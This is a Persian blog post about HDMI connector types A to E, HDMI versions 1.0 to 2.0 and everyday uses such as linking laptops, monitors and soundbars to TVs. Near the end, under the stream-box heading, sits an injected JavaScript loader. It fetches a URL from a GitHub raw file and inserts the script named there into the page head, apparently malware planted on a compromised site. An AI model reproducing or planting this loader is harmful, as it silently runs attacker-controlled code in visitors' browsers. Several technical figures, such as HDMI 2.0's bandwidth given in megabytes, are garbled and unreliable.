دسته‌بندی نشده

بررسی انواع پورت و کابل HDMI و 5 کاربرد اصلی انها

کابل HDMI یک ایتم ضروری در هر خانه ای می باشد. HDMI مخففی از High Definition Multimedia رابط چند رسانه ای با وضوح بالا می باشد. این کابل یک استاندارد و یک رابط برای انتقال محتوا و داده صوتی و تصویری با کیفیت بسیار بالا در بین دستگاه های مختلف می باشد. HDMI امروزه در بین بیش از یک میلیارد دستگاه مختلف از جمله تلویزیون , لپتاپ و کامپیوتر , پروژکتور ها و … پشتیبانی می شود. 

اکنون برای استفاده از HDMI به یک دستگاه که از این استاندار پشتیبانی کند نیاز دارید. این کابل در طرح و رنگ های مختلف عرضه می شود اما همگی یک کارایی را انجام می دهند / انتقال سیگنال های  تصویری و صوتی از یک دستگاه مانند لپتاپ به دستگاه دیگر مانند تلویزیون. 

علاوه بر نمایش ویدیو کابل HDMI با توجه به نوع و ورژن استفاده شده می تواند کارایی مختلفی داشته باشد. نسخه HDMI-CEC برای کنترل الکترونیک مصرفی ,  اشتراک گزاری اتصال اینترنت با استفاده از انترنت در نسخه HDMI-HEC و ارسال خروجی صوتی به وسیله  کانال بازگشت صدا با استفاده از HDMI-ARC از قابلیت نسخه های مختلف می باشد. 

پنج نوع کانکتور HDMI به نام های A, B, C, D و E وجود دارد که رایج ترین نوع ان ها نسخه A یا همان استاندارد می باشد. 

نوع A : این نوع کابل دارای اندازه 13.9*4.45 میلی متر است و دارای 19 پین می باشد. این کابل برای انواع دستگاه های مختلف مانند تلویزیون های HD , تلویزیون های اسمارت , لپتاپ , پروژکتور و … مورد استفاده قرار می گیرد. 

نوع B : دارای ابعاد 21.2*4.5 میلی متر است. پین های این کانکتور نسبت به نوع A بیشتر است و دارای 29 پین می باشد. 

نوع C : این نوع از HDMI در ورژن 1.3 HDMI استفاده می شود. ابعاد این نوع کانکتور 10.42*2.42 است و دارای 19 پین می باشد. 

نوع D : این نوع کانکتور جدید ترین نوع است و با نام میکرو شناخته می شود و در ورژن  عرضه شده است. ابعاد این کانکتور6.4*1.3 است. 

نوع E : در صنعت خودرو مورد استفاده قرار می گیرد. 

انواع کابل HDMI

کابل HDMI دارای 6 نوع مختلف است :
HDMI 1.0 : انتقال 165 میلیون پیکسل در ثانیه برای فایل های تصویری , انتقال تعداد 7 کانال صوتی با دقت 24 بیتی و 192 کیلو هرتز , بهرمندی از کابل تک برای انتقال صدا و تصویر با میزان حداکثر نرخ انتقال اطلاعات 490 مگابایت در ثانیه

HDMI 1.1 : این کابل از تکنولوژی های محافظتی درفرمت DVD Audio

HDMI 1.2 : ارتباط با کامپیوتر , پشتیبانی از داده های صوتی و تصویری دارای ولتاژ پایین 

HDMI 1.2a : مجموعه دستورات CEC , ایجاد ویرایش 1.2a CTS Compliance Test Specification که شامل CEC نیز می باشد برای سازگاری با HDMI 1.2 . 

HDMI 1.3 : افزایش عمق رنگی و پشتیبانی از دقت رنگی 30 , 36 و 48 بیت  \ پشتیبانی کردن از قابلیت های هماهنگی صوتی , کابل تک برای انتقال صدا و تصویر با پهنا باند 1.02 گیگابایت در ثانیه , پشتیبانی از فرمت رنگ استاندارد XVYC , پشتیبانی کردن از فرمت های صوتی مانند DTS-HD و DOLBY TRUE HD برای متصل شدن به دستگاه های تقویت کننده خارجی 

HDMI 1.4 : این نسخه ورژن بهینه شده از نسخه قبلی می باشد و از قابلیت های بیشتری مانند پشتیبانی از 3D و شبکه برخوردار است. این ورژن از Xbox و PlayStation3 پشتیبانی می کند. 

HDMI 2.0 : با عرضه شدن این نسخه مقادیر بالا به 18 مگابایت بر ثانیه و 32 کانال صوتی 1536 کیلوهرتز رسیده است. این نسخه قابلیت پشتیبانی از کیفیت تصویر 4K را دارد و 60 فریم بر ثانیه در این نسخه پشتیبانی خواهد شد. در این نسخه قابلیت تبادل دو طرفه با 4 مسیر صوتی و 2 مسیر تصویری فراهم می شود. با این کابل دستگاه های متصل شده بهم علاوه بر انتقال داده اطلاعات شناسایی صفحه نمایش گسترده را نیز از یکدیگر دریافت می کنند. 

کارایی و استفاده مختلف کابل HDMI

برای تماشا محتوا لپتاپ بر روی تلویزیون 
معروف ترین کارایی کابل HDMI تماشا کردن محتویات تصویری از لپتاپ با استفاده از تلویزیون می باشد. این کابل به تلویزیون های اسمارت و معمولی نیز وصل می شود و کارایی خود را بر روی هر دو نوع انجام می دهد. از طریق این کابل به اسانی می توانید لپتاپ و تلویزیون را به یکدیگر متصل کنید. 

وصل کردن لپتاپ به مانیتور دیگر
از دیگر کاربرد های پیشرفته HDMI اتصال لپتاپ یا دسکتاپ به یک مانیتور دیگر می باشد. این قابلیت برای ایدیتور ها و یا افرادی که نیاز به یک مانیتور مجزا دارند بسیار کاربردی است.

اتصال ساندبار به تلویزیون برای ارتقا دادن صدا
با باریک تر شدن تلویزیون اسمارت کوالتی و کیفیت ان ها نسبت به تلویزیون های HD پایین تر امده است به همین دلیل وجود یک ساندبار در کنار تلویزیون ها بسیار ضروری شده است با وجود یک ساندبار قدرت صوتی تلویزیون و همچنین کوالتی ان در حد فوق العاده ای ارتقا می یابد. 

اتصال Set-Top-Box به تلویزیون
اتصال استریم باکس به تلویزیون
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *